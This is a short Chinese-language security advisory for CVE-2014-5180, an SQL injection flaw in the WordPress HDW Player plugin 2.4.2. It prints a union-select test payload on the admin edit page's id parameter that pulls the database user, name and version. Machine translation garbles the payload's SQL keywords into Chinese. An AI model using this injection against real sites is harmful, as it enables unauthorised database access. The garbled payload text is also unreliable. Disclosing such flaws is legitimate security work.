受影响的系统:
WordPress HDW 播放器 2.4.2
WordPress HDW 播放器
描述:
-------------------------------------------------- ----------------------------------
错误追踪 ID:69105
CVE(CAN) ID:CVE-2014-5180
WordPress HDW Player 插件将 HDW 播放器嵌入到您的 WordPress 网站中。
HDW Player 2.4.2等版本的视频页面存在SQL注入漏洞。 经过身份验证的远程攻击者可以利用此漏洞通过编辑 wp-admin/admin.php 操作中的 id 参数来执行任意 SQL 命令。
测试方法:
-------------------------------------------------- ----------------------------------
警告
以下程序(方法)可能具有攻击性,仅用于安全研究和教学目的。 使用风险自负!
?page=videos&opt=edit&id=2 联合选择
1,2,用户(),4,5,6,数据库(),8,@@版本,10,11,12
建议:
-------------------------------------------------- ----------------------------------
厂商补丁:
WordPress
----------
目前厂商尚未提供补丁或升级程序。 我们建议该软件的用户始终关注制造商的主页以获取最新版本:
本文永久更新链接地址:
